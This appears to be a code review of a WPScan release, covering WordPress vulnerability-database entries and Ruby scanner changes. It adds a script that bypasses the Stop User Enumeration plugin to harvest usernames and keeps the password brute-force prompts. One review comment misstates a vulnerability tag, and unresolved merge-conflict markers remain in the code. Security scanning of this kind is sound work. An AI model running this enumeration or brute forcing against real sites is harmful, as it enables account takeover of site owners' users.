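Review bot: The "Plupload Unspecified XSS" entry added to the 3.7.1 block is tagged `<type>BYPASS</type>`, which contradicts its title. Suggest `<type>XSS</type>`, matching the entries with the same title further down in this file.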
@@ -288,6 +357,30 @@
<type>REDIRECT</type>
<fixed_in>3.6.1</fixed_in>
</vulnerability>
<vulnerability>
<title>Shortcodes / Post Content Multiple Unspecified XSS</title>
<references>
<osvdb>89576</osvdb>
<cve>2013-0236</cve>
<secunia>51967</secunia>
<url>http://www.securityfocus.com/bid/57554</url>
<url>http://securitytracker.com/id?1028045</url>
</references>
<type>XSS</type>
<fixed_in>3.5.1</fixed_in>
</vulnerability>
<vulnerability>
<title>Plupload Unspecified XSS</title>
<references>
<osvdb>89577</osvdb>
<cve>2013-0237</cve>
<secunia>51967</secunia>
<url>http://www.securityfocus.com/bid/57555</url>
<url>http://securitytracker.com/id?1028045</url>
</references>
<type>XSS</type>
<fixed_in>3.5.1</fixed_in>
</vulnerability>
</wordpress>
<wordpress version="3.4.2">
@@ -352,6 +445,18 @@
<type>REDIRECT</type>
<fixed_in>3.6.1</fixed_in>
</vulnerability>
<vulnerability>
<title>Plupload Unspecified XSS</title>
<references>
<osvdb>89577</osvdb>
<cve>2013-0237</cve>
<secunia>51967</secunia>
<url>http://www.securityfocus.com/bid/57555</url>
<url>http://securitytracker.com/id?1028045</url>
</references>
<type>XSS</type>
<fixed_in>3.5.1</fixed_in>
</vulnerability>
</wordpress>
<wordpress version="3.4.1">
@@ -409,6 +514,18 @@
<type>REDIRECT</type>
<fixed_in>3.6.1</fixed_in>
</vulnerability>
<vulnerability>
<title>Plupload Unspecified XSS</title>
<references>
<osvdb>89577</osvdb>
<cve>2013-0237</cve>
<secunia>51967</secunia>
<url>http://www.securityfocus.com/bid/57555</url>
<url>http://securitytracker.com/id?1028045</url>
</references>
<type>XSS</type>
<fixed_in>3.5.1</fixed_in>
</vulnerability>
</wordpress>
<wordpress version="3.4">
@@ -466,6 +583,18 @@
<type>REDIRECT</type>
<fixed_in>3.6.1</fixed_in>
</vulnerability>
<vulnerability>
<title>Plupload Unspecified XSS</title>
<references>
<osvdb>89577</osvdb>
<cve>2013-0237</cve>
<secunia>51967</secunia>
<url>http://www.securityfocus.com/bid/57555</url>
<url>http://securitytracker.com/id?1028045</url>
</references>
<type>XSS</type>
<fixed_in>3.5.1</fixed_in>
</vulnerability>
</wordpress>
<wordpress version="3.4-beta4">
@@ -511,6 +640,18 @@
<type>REDIRECT</type>
<fixed_in>3.6.1</fixed_in>
</vulnerability>
<vulnerability>
<title>Plupload Unspecified XSS</title>
<references>
<osvdb>89577</osvdb>
<cve>2013-0237</cve>
<secunia>51967</secunia>
<url>http://www.securityfocus.com/bid/57555</url>
<url>http://securitytracker.com/id?1028045</url>
</references>
<type>XSS</type>
<fixed_in>3.5.1</fixed_in>
</vulnerability>
</wordpress>
<wordpress version="3.3.3">
@@ -549,6 +690,18 @@
<type>REDIRECT</type>
<fixed_in>3.6.1</fixed_in>
</vulnerability>
<vulnerability>
<title>Plupload Unspecified XSS</title>
<references>
<osvdb>89577</osvdb>
<cve>2013-0237</cve>
<secunia>51967</secunia>
<url>http://www.securityfocus.com/bid/57555</url>
<url>http://securitytracker.com/id?1028045</url>
</references>
<type>XSS</type>
<fixed_in>3.5.1</fixed_in>
</vulnerability>
</wordpress>
<wordpress version="3.3.2">
@@ -625,6 +778,18 @@
<type>REDIRECT</type>
<fixed_in>3.6.1</fixed_in>
</vulnerability>
<vulnerability>
<title>Plupload Unspecified XSS</title>
<references>
<osvdb>89577</osvdb>
<cve>2013-0237</cve>
<secunia>51967</secunia>
<url>http://www.securityfocus.com/bid/57555</url>
<url>http://securitytracker.com/id?1028045</url>
</references>
<type>XSS</type>
<fixed_in>3.5.1</fixed_in>
</vulnerability>
</wordpress>
<wordpress version="3.3.1">
@@ -1658,6 +1823,7 @@
<vulnerability>
<title>wp-includes/comment.php bypass intended spam restrictions via a crafted URL</title>
<references>
<osvdb>104693</osvdb>
<cve>2010-5293</cve>
</references>
<type>UNKNOWN</type>
@@ -1792,10 +1958,11 @@
<vulnerability>
<title>When a Multisite installation is used, permanently retains the "site administrators can add users" option once changed, which might allow remote authenticated administrators to bypass intended access restrictions in opportunistic circumstances via an add action after a temporary change.</title>
<references>
<osvdb>104691</osvdb>
<cve>2010-5297</cve>
</references>
<type>AUTHBYPASS</type>
<fixed_in>3.0</fixed_in>
<fixed_in>3.0.1</fixed_in>
</vulnerability>
<vulnerability>
<title>Crafted String URL Redirect Restriction Bypass</title>
@@ -1838,6 +2005,7 @@
<vulnerability>
<title>wp-includes/comment.php bypass intended spam restrictions via a crafted URL</title>
<references>
<osvdb>104693</osvdb>
<cve>2010-5293</cve>
</references>
<type>UNKNOWN</type>

View File

@@ -23,6 +23,8 @@ class Browser
attr_reader :hydra, :cache_dir
attr_accessor :referer
# @param [ Hash ] options
#
# @return [ Browser ]
@@ -135,6 +137,7 @@ class Browser
)
end
params.merge!(referer: referer)
params.merge!(timeout: @request_timeout) if @request_timeout
params.merge!(connecttimeout: @connect_timeout) if @connect_timeout
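Review bot: `params.merge!(referer: referer)` is applied unconditionally, unlike the two timeout merges right after it, so every request gets a `referer: nil` entry whenever no referer was set on the browser. Guarding it the same way as its neighbours (`params.merge!(referer: referer) if referer`) keeps nil values out of the request options. The `@param`/`@return` comments above `attr_accessor :referer` also say nothing about the new accessor; a one-line comment stating who is expected to set it would help.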

View File

@@ -17,6 +17,7 @@ class WpItems < Array
hydra = browser.hydra
targets = targets_items(wp_target, options)
progress_bar = progress_bar(targets.size, options)
queue_count = 0
exist_options = {
error_404_hash: wp_target.error_404_hash,
homepage_hash: wp_target.homepage_hash,
@@ -43,8 +44,16 @@ class WpItems < Array
end
hydra.queue(request)
queue_count += 1
if queue_count >= browser.max_threads
hydra.run
queue_count = 0
puts "Sent #{browser.max_threads} requests ..." if options[:verbose]
end
end
# run the remaining requests
hydra.run
results.sort!
results # can't just return results.sort because the #sort returns an array, and we want a WpItems
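Review bot: calling `hydra.run` inside the loop once `queue_count >= browser.max_threads` makes each batch wait for its slowest request before anything else is queued, so a single slow response stalls the enumeration for that whole batch. If the batching is there to bound memory, say so in a comment next to `queue_count` so the trade-off is not "optimised" away later. The verbose `puts "Sent #{browser.max_threads} requests ..."` will also interleave with the progress bar output; consider dropping it or routing it through the progress bar.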

View File

@@ -34,7 +34,7 @@ WP_VERSIONS_XSD = DATA_DIR + '/wp_versions.xsd'
LOCAL_FILES_XSD = DATA_DIR + '/local_vulnerable_files.xsd'
USER_AGENTS_FILE = DATA_DIR + '/user-agents.txt'
WPSCAN_VERSION = '2.3'
WPSCAN_VERSION = '2.4'
$LOAD_PATH.unshift(LIB_DIR)
$LOAD_PATH.unshift(WPSCAN_LIB_DIR)
@@ -64,6 +64,14 @@ end
require_files_from_directory(COMMON_LIB_DIR, '**/*.rb')
# Hook to check if the target if down during the scan
# The target is considered down after 10 requests with status = 0
down = 0
Typhoeus.on_complete do |response|
down += 1 if response.code == 0
fail 'The target seems to be down' if down >= 10
end
# Add protocol
def add_http_protocol(url)
url =~ /^https?:/ ? url : "http://#{url}"
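Review bot: the `down` counter in the `Typhoeus.on_complete` hook is never reset, so it counts every `response.code == 0` seen during the whole run rather than consecutive ones. On a long enumeration, ten unrelated timeouts spread over thousands of requests will abort the scan with 'The target seems to be down' even though the target is answering. Resetting the counter on any non-zero code (`down = response.code == 0 ? down + 1 : 0`) matches what the comment describes. The threshold of 10 would be easier to maintain as a named constant, and the comment has a typo ("if the target if down").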

View File

@@ -43,8 +43,6 @@ class WpTheme < WpItem
end
end
# http://code.google.com/p/wpscan/issues/detail?id=141
#
# @param [ URI ] target_uri
#
# @return [ WpTheme ]

View File

@@ -12,7 +12,7 @@ class WpUser < WpItem
# @return [ Array<Symbol> ]
def allowed_options; [:id, :login, :display_name, :password] end
# @return [ URI ] The uri to the auhor page
# @return [ URI ] The uri to the author page
def uri
if id
return @uri.merge("?author=#{id}")
@@ -54,8 +54,8 @@ class WpUser < WpItem
# @return [ String ]
def to_s
s = "#{id}"
s += " | #{login}" if login
s += " | #{display_name}" if display_name
s << " | #{login}" if login
s << " | #{display_name}" if display_name
s
end

View File

@@ -190,8 +190,6 @@ class WpVersion < WpItem
# Attempts to find the WordPress version from the sitemap.xml file.
#
# See: http://code.google.com/p/wpscan/issues/detail?id=109
#
# @param [ URI ] target_uri
#
# @return [ String ] The version number

View File

@@ -32,7 +32,7 @@ class WebSite
def has_xml_rpc?
response = Browser.get_and_follow_location(xml_rpc_url)
response.body =~ %r{XML-RPC server accepts POST requests only}i
response.body =~ %r{XML-RPC server accepts POST requests only}i
end
# See http://www.hixie.ch/specs/pingback/pingback-1.0#TOC2.3
@@ -71,7 +71,7 @@ class WebSite
#
# @return [ String ] The MD5 hash of the page
def self.page_hash(page)
page = Browser.get(page) unless page.is_a?(Typhoeus::Response)
page = Browser.get(page, { followlocation: true, cache_ttl: 0 }) unless page.is_a?(Typhoeus::Response)
Digest::MD5.hexdigest(page.body.gsub(/<!--.*?-->/m, ''))
end

View File

@@ -29,6 +29,7 @@ class WpTarget < WebSite
@multisite = nil
Browser.instance(options.merge(:max_threads => options[:threads]))
Browser.instance.referer = url
end
# check if the target website is
@@ -38,6 +39,11 @@ class WpTarget < WebSite
response = Browser.get_and_follow_location(@uri.to_s)
# Note: in the future major WPScan version, change the user-agent to see
# if the response is a 200 ?
fail "The target is responding with a 403, this might be due to a WAF or a plugin\n" \
'You should try to supply a valid user-agent via the --user-agent option' if response.code == 403
if response.body =~ /["'][^"']*\/wp-content\/[^"']*["']/i
wordpress = true
else
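Review bot: the `fail ... if response.code == 403` statement aborts before the `wp-content` body check that follows, so a target that answers 403 is never tested for WordPress markers and the caller cannot tell "blocked" from any other failure except by parsing the message. Raising a dedicated error class, or returning a distinct state, would let the caller decide how to react. The trailing `if` modifier after a two-line string literal is also easy to miss; an explicit `if response.code == 403 ... end` block reads more clearly.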
@@ -93,7 +99,7 @@ class WpTarget < WebSite
end
# :nocov:
# The version is not yet considerated
# The version is not yet considered
#
# @param [ String ] name
# @param [ String ] version

View File

@@ -12,7 +12,6 @@ class WpTarget < WebSite
end
# Checks if a login protection plugin is enabled
# http://code.google.com/p/wpscan/issues/detail?id=111
# return a WpPlugin object or nil if no one is found
def login_protection_plugin
unless @login_protection_plugin

View File

@@ -101,5 +101,6 @@ def help
puts '--max-threads <max-threads> Maximum Threads'
puts '--help | -h This help screen.'
puts '--verbose | -v Verbose output.'
puts '--batch Never ask for user input, use the default behaviour.'
puts
end

View File

@@ -3,6 +3,7 @@
class WpscanOptions
ACCESSOR_OPTIONS = [
:batch,
:enumerate_plugins,
:enumerate_only_vulnerable_plugins,
:enumerate_all_plugins,
@@ -252,10 +253,11 @@ class WpscanOptions
['--basic-auth', GetoptLong::REQUIRED_ARGUMENT],
['--debug-output', GetoptLong::NO_ARGUMENT],
['--version', GetoptLong::NO_ARGUMENT],
['--cache_ttl', GetoptLong::REQUIRED_ARGUMENT],
['--request_timeout', GetoptLong::REQUIRED_ARGUMENT],
['--connect_timeout', GetoptLong::REQUIRED_ARGUMENT],
['--max_threads', GetoptLong::REQUIRED_ARGUMENT]
['--cache-ttl', GetoptLong::REQUIRED_ARGUMENT],
['--request-timeout', GetoptLong::REQUIRED_ARGUMENT],
['--connect-timeout', GetoptLong::REQUIRED_ARGUMENT],
['--max-threads', GetoptLong::REQUIRED_ARGUMENT],
['--batch', GetoptLong::NO_ARGUMENT]
)
end
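Review bot: the underscore spellings (`--cache_ttl`, `--request_timeout`, `--connect_timeout`, `--max_threads`) disappear from the GetoptLong table without an alias, so existing command lines and wrapper scripts that use them will now be rejected as invalid options. Either keep the old names as additional entries for one release or call the rename out explicitly in the changelog. It is also worth checking that the code which reads the parsed options maps the hyphenated names to the same setters as before.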

View File

@@ -32,10 +32,12 @@ class CheckerPlugin < Plugin
xml = xml(vuln_ref_file)
urls = []
xml.xpath('//reference').each { |node| urls << node.text }
xml.xpath('//references/url').each { |node| urls << node.text }
urls.uniq!
puts "[!] No URLs found in #{vuln_ref_file}!" if urls.empty?
dead_urls = []
queue_count = 0
request_count = 0
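Review bot: the selector `//references/url` only collects `<url>` children, so the `<osvdb>`, `<cve>` and `<secunia>` entries that the vulnerability files in this same commit carry are never link-checked. If that is intentional, a short comment above the `xpath` call would make it clear. The new `[!] No URLs found` warning prints and then carries on with an empty list; returning early at that point would avoid running the rest of the checker for nothing.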

View File

@@ -20,7 +20,6 @@ class StatsPlugin < Plugin
puts "WPScan Database Statistics:"
puts "---------------------------"
puts "[#] Total WordPress Sites in the World: #{get_wp_installations}"
puts
puts "[#] Total vulnerable versions: #{vuln_core_count}"
puts "[#] Total vulnerable plugins: #{vuln_plugin_count}"
@@ -79,9 +78,4 @@ class StatsPlugin < Plugin
IO.readlines(file).size
end
def get_wp_installations()
page = Nokogiri::HTML(Typhoeus.get('http://en.wordpress.com/stats/').body)
page.css('span[class="stats-flipper-number"]').text
end
end

View File

@@ -131,7 +131,8 @@ describe Browser do
ssl_verifypeer: false, ssl_verifyhost: 0,
cookiejar: cookie_jar, cookiefile: cookie_jar,
timeout: 2000, connecttimeout: 1000,
maxredirs: 3
maxredirs: 3,
referer: nil
}
}

View File

@@ -97,6 +97,14 @@ describe WpTarget do
wp_target.should_not be_wordpress
end
end
context 'when the response is a 403' do
before { stub_request(:any, /.*/).to_return(status: 403) }
it 'raises an error' do
expect { wp_target.wordpress? }.to raise_error
end
end
end
describe '#wordpress_hosted?' do
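Review bot: `expect { wp_target.wordpress? }.to raise_error` with no class or message passes on any exception, including a `NoMethodError` from an unrelated regression, so the example does not actually pin the 403 behaviour. Matching on the message, for example `raise_error(/403/)`, ties the spec to the check it is meant to cover.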

View File

@@ -27,7 +27,6 @@ shared_examples 'WpTarget::WpReadme' do
@expected = true
end
# http://code.google.com/p/wpscan/issues/detail?id=108
it 'returns true even if the readme.html is not in english' do
@stub = { status: 200, body: File.new(fixtures_dir + '/readme-3.3.2-fr.html') }
@expected = true

73
stop_user_enumeration_bypass.rb Executable file
View File

@@ -0,0 +1,73 @@
#!/usr/bin/env ruby
# encoding: UTF-8
#
#
# Script based on http://seclists.org/fulldisclosure/2014/Feb/3
require File.join(File.dirname(__FILE__), 'lib/wpscan/wpscan_helper')
@opts = {
ids: 1..10,
verbose: false,
user_agent: 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:9.0) Gecko/20100101 Firefox/9.0'
}
parser = OptionParser.new('Usage: ./stop_user_enumeration_bypass.rb <Target URL> [options]', 35) do |opts|
opts.on('--proxy PROXY', 'Proxy to use') do |proxy|
@opts[:proxy] = proxy
end
opts.on('--auth Username:Password', 'Credentials to use if Basic/NTLM auth') do |creds|
@opts[:creds] = creds
end
opts.on('--ids START-END', 'The ids to check, default is 1-10') do |ids|
@opts[:ids] = Range.new(*ids.split('-').map(&:to_i))
end
opts.on('--user-agent UA', 'The user-agent to use') do |ua|
@opts[:user_agent] = ua
end
opts.on('--verbose', '-v', 'Verbose Mode') do
@opts[:verbose] = true
end
end
begin
parser.parse!
fail "#{red('The target URL must be supplied')}\n\n#{parser}" unless ARGV[0]
uri = URI.parse(add_trailing_slash(add_http_protocol(ARGV[0])))
request_params = {
proxy: @opts[:proxy],
userpwd: @opts[:creds],
headers: { 'User-Agent' => @opts[:user_agent] },
followlocation: true,
ssl_verifypeer: false,
ssl_verifyhost: 2
}
detected_users = WpUsers.new
@opts[:ids].each do |user_id|
user = WpUser.new(uri, id: user_id)
if user.exists_from_response?(Typhoeus.post(uri, request_params.merge(body: { author: user_id })))
detected_users << user
end
end
puts 'Usernames found:'
detected_users.output
rescue => e
puts e.message
if @opts[:verbose]
puts red('Trace:')
puts red(e.backtrace.join("\n"))
end
exit(1)
end
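Review bot: `request_params` hard-codes `ssl_verifypeer: false`, so the `--auth` credentials and every request are sent without validating the server certificate, and `ssl_verifyhost: 2` adds little once the chain itself is not checked. Verification should default to on, with an explicit switch to turn it off for targets that need it. Separately, `Range.new(*ids.split('-').map(&:to_i))` accepts anything: a single number raises an ArgumentError and non-numeric input silently becomes `0..0`. Validating the `START-END` format before building the range would give a usable error message.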

View File

@@ -63,12 +63,11 @@ def main
end
end
redirection = wp_target.redirection
if redirection
if (redirection = wp_target.redirection)
if wpscan_options.follow_redirection
puts "Following redirection #{redirection}"
puts
else
<<<<<<< HEAD
puts "#{blue('[i]')} The remote host tried to redirect to: #{redirection}"
print "[?] Do you want follow the redirection ? [y/n] "
end
@@ -79,6 +78,22 @@ def main
else
puts "#{red('[!]')} Scan aborted"
exit(0)
=======
puts "The remote host redirects to: #{redirection}"
puts '[?] Do you want follow the redirection ? [Y]es [N]o [A]bort, default: [N]'
end
if wpscan_options.follow_redirection || !wpscan_options.batch
if wpscan_options.follow_redirection || (input = Readline.readline) =~ /^y/i
wpscan_options.url = redirection
wp_target = WpTarget.new(redirection, wpscan_options.to_h)
else
if input =~ /^a/i
puts 'Scan aborted'
exit(0)
end
end
>>>>>>> master
end
end
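Review bot: the conflict markers `<<<<<<< HEAD` (in the previous hunk), `=======` and `>>>>>>> master` are still in the file after this change, so both sides of the redirection prompt are present and the script will not parse as Ruby. Resolve the conflict by keeping one side and deleting the marker lines together with the leftover branch from the other side. The `[Y]es [N]o [A]bort` version that checks `wpscan_options.batch` appears to be the intended one. A quick `ruby -c` on the file before committing would catch this.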
@@ -100,8 +115,8 @@ def main
unless wp_target.wp_plugins_dir_exists?
puts "The plugins directory '#{wp_target.wp_plugins_dir}' does not exist."
puts 'You can specify one per command line option (don\'t forget to include the wp-content directory if needed)'
print '[?] Continue? [y/n] '
unless Readline.readline =~ /^y/i
puts '[?] Continue? [Y]es [N]o, default: [N]'
if wpscan_options.batch || Readline.readline !~ /^y/i
exit(0)
end
end
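Review bot: with `if wpscan_options.batch || Readline.readline !~ /^y/i` the batch path still prints the `[?] Continue?` question and then leaves through `exit(0)`, so an unattended run that stops here is indistinguishable from a scan that completed. In batch mode, skip the prompt, print why the scan is stopping, and exit with a non-zero status so calling scripts can detect it.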
@@ -148,7 +163,7 @@ def main
wp_target.interesting_headers.each do |header|
output = "#{green('[+]')} Interesting header: "
if header[1].class == Array
if header[1].class == Array
header[1].each do |value|
puts output + "#{header[0]}: #{value}"
end
@@ -294,6 +309,11 @@ def main
puts
puts "#{green('[+]')} Enumerating usernames ..."
if wp_target.has_plugin?('stop-user-enumeration')
puts "#{red('[!]')} Stop User Enumeration plugin detected, results might be empty. " \
"However a bypass exists, see stop_user_enumeration_bypass.rb in #{File.expand_path(File.dirname(__FILE__))}"
end
wp_users = WpUsers.aggressive_detection(wp_target,
enum_options.merge(
range: wpscan_options.enumerate_usernames_range,
@@ -328,11 +348,11 @@ def main
puts
puts "#{red('[!]')} The plugin #{protection_plugin.name} has been detected. It might record the IP and timestamp of every failed login and/or prevent brute forcing altogether. Not a good idea for brute forcing!"
print "[?] Do you want to start the brute force anyway ? [y/n] "
puts '[?] Do you want to start the brute force anyway ? [Y]es [N]o, default: [N]'
bruteforce = false if Readline.readline !~ /^y/i
bruteforce = false if wpscan_options.batch || Readline.readline !~ /^y/i
end
puts
if bruteforce
puts "#{green('[+]')} Starting the password brute forcer"
@@ -354,7 +374,7 @@ def main
stop_time = Time.now
elapsed = stop_time - start_time
used_memory = get_memory_usage - start_memory
puts
puts green("[+] Finished: #{stop_time.asctime}")
puts green("[+] Memory used: #{used_memory.bytes_to_human}")
@@ -362,13 +382,13 @@ def main
exit(0) # must exit!
rescue SystemExit, Interrupt
rescue => e
if e.backtrace[0] =~ /main/
puts red(e.message)
else
puts red("[ERROR] #{e.message}")
puts red("Trace:")
puts
puts red(e.message)
if wpscan_options && wpscan_options.verbose
puts red('Trace:')
puts red(e.backtrace.join("\n"))
end
exit(1)